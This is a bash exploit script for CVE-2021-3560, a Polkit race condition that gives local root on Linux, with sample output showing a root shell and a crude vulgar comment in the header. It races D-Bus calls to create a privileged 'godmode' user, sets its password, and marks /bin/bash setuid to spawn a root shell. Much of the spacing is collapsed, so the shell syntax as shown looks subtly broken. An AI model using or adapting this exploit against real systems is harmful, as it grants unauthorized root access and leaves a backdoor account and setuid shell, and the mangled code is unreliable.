#!/bin/bash# Exploit by: Marshall Whittaker / oxagast# oxagast@oxasploits.com# Discovery by: Kevin Backhouse# Polkit 0.113 - 0.118 LPE via Race Condition# CVE-2021-3560# https://oxasploits.com/posts/exploit-archive-partial-disclosure/# Note: you will manually need to remove the godmode user# as well as chmod a-s /bin/bash and rm /tmp/oneup.sh afterwards.# My neck, my back lick it lick my pussy and my crack.## [marshall@jerkon CVE-2021-3560]$ ./polkit_godmode_0day.sh # Error org.freedesktop.DBus.Error.UnknownMethod: No such interface ?org.freedesktop.Accounts.User? on object at path /org/freedesktop/Accounts/User# ./polkit_godmode_0day.sh: line 13: kill: (197626) - No such process# Error org.freedesktop.DBus.Error.UnknownMethod: No such interface ?org.freedesktop.Accounts.User? on object at path /org/freedesktop/Accounts/User# ./polkit_godmode_0day.sh: line 13: kill: (197630) - No such process# Error org.freedesktop.DBus.Error.UnknownMethod: No such interface ?org.freedesktop.Accounts.User? on object at path /org/freedesktop/Accounts/User# Password: # [sudo] password for godmode: bash-5.1# # bash-5.1# id; whoami;uname -a;# uid=1000(marshall) gid=1000(marshall) euid=0(root) egid=0(root) groups=0(root),998(wheel),1000(marshall)# root# Linux jerkon.oxagast.org 5.10.41-1-MANJARO #1 SMP PREEMPT Fri May 28 19:10:32 UTC 2021 x86_64 GNU/Linux# bash-5.1# function sploit {P=$(openssl passwd -5 a);for i in{0..10};do
dbus-send --system--dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:godmode string:"gg" int32:1 & sleep 0.002s ;kill$!ID=$(cat /etc/passwd | grep godmode | cut-d':'-f 3 | tr-d'\n');
dbus-send --system--dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$ID org.freedesktop.Accounts.User.SetPassword string:$P string:god & sleep 0.002s ;kill$!done;sleep 0.5;echo'echo a | sudo -S chmod a+s /bin/bash'> /tmp/oneup.sh;chmod a+x /tmp/oneup.sh;(sleep 1;echo a) | socat - EXEC:'su godmode -c /tmp/oneup.sh',pty;
spawn;}function spawn {if[-u /bin/bash ];then
/bin/bash -p;else
echo error...
fi;}
sploit;